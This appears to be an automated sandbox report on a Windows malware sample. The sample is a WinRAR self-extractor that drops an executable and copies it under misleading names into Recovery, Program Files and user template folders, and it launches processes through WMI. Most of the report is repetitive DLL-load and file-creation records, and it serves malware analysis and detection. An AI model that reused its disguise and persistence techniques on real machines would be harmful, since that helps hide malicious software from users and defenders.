                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeDirectory created: C:\Program Files\Windows NT\Accessories\en-GB\6ccacd8608530fJump to behavior
                                    Source: PbfYaIvR5B.exeStatic file information: File size 2319208 > 1048576
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: PbfYaIvR5B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: PbfYaIvR5B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: PbfYaIvR5B.exe, 00000000.00000003.1690511695.00000000073F8000.00000004.00000020.00020000.00000000.sdmp, PbfYaIvR5B.exe, 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000000.1688277278.0000000000073000.00000002.00000001.01000000.00000003.sdmp, PbfYaIvR5B.exe, 00000000.00000003.1689915107.0000000006AE0000.00000004.00000020.00020000.00000000.sdmp
                                    Source: PbfYaIvR5B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: PbfYaIvR5B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: PbfYaIvR5B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: PbfYaIvR5B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: PbfYaIvR5B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeFile created: C:\webHostnet\__tmp_rar_sfx_access_check_4875687Jump to behavior
                                    Source: PbfYaIvR5B.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005F640 push ecx; ret 0_2_0005F653
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005EB78 push eax; ret 0_2_0005EB96
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BAC4B8D push edx; retf 6_2_00007FFD9BAC4B93
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEBE452 push eax; ret 6_2_00007FFD9BEBE459
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEBE424 push esp; ret 6_2_00007FFD9BEBE425
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEBFBC4 push E8FFFFFFh; retf 6_2_00007FFD9BEBFBC9
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEBE682 push edx; ret 6_2_00007FFD9BEBE68F
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 6_2_00007FFD9BEBE614 push esp; ret 6_2_00007FFD9BEBE615
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAF60B1 pushfd ; ret 28_2_00007FFD9BAF60F1
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAC4B8D push edx; retf 28_2_00007FFD9BAC4B93
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAD8D1D push es; iretd 28_2_00007FFD9BAD8D29
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeCode function: 28_2_00007FFD9BAD908E pushfd ; retf 28_2_00007FFD9BAD9093
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 29_2_00007FFD9BAD4B8D push edx; retf 29_2_00007FFD9BAD4B93
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAD8D1D push es; iretd 30_2_00007FFD9BAD8D29
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAD908E pushfd ; retf 30_2_00007FFD9BAD9093
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAC4B8D push edx; retf 30_2_00007FFD9BAC4B93
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeCode function: 30_2_00007FFD9BAF60B1 pushfd ; ret 30_2_00007FFD9BAF60F1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAB8D1D push es; iretd 31_2_00007FFD9BAB8D29
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAB908E pushfd ; retf 31_2_00007FFD9BAB9093
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAA4B8D push edx; retf 31_2_00007FFD9BAA4B93
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 31_2_00007FFD9BAD60B1 pushfd ; ret 31_2_00007FFD9BAD60F1
                                    Source: C:\webHostnet\MsPortSavesruntime.exeCode function: 32_2_00007FFD9BA94B8D push edx; retf 32_2_00007FFD9BA94B93
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeCode function: 50_2_00007FFD9BAA4B8D push edx; retf 50_2_00007FFD9BAA4B93
                                    Source: MsPortSavesruntime.exe.0.drStatic PE information: section name: .text entropy: 7.548029610292584
                                    Source: AvdGjRxbXYfvkpkpztF.exe.6.drStatic PE information: section name: .text entropy: 7.548029610292584
                                    Source: AvdGjRxbXYfvkpkpztF.exe0.6.drStatic PE information: section name: .text entropy: 7.548029610292584
                                    Source: Idle.exe.6.drStatic PE information: section name: .text entropy: 7.548029610292584
                                    Source: AvdGjRxbXYfvkpkpztF.exe1.6.drStatic PE information: section name: .text entropy: 7.548029610292584

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\webHostnet\MsPortSavesruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\MXTAwxLv.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\lhjGsiaz.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\XLyrgJGd.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\mhsoucuo.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\CjxtNgkC.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\XGvzhUkS.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\wVOwcuVh.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\webHostnet\AvdGjRxbXYfvkpkpztF.exeJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\MaBbbrQq.logJump to dropped file
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeFile created: C:\webHostnet\MsPortSavesruntime.exeJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\XurZRnMb.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\MSRJxIpk.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\MaBbbrQq.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\XGvzhUkS.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\MSRJxIpk.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\CjxtNgkC.logJump to dropped file
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile created: C:\Users\user\Desktop\mhsoucuo.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\XurZRnMb.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\XLyrgJGd.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\MXTAwxLv.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\wVOwcuVh.logJump to dropped file
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeFile created: C:\Users\user\Desktop\lhjGsiaz.logJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
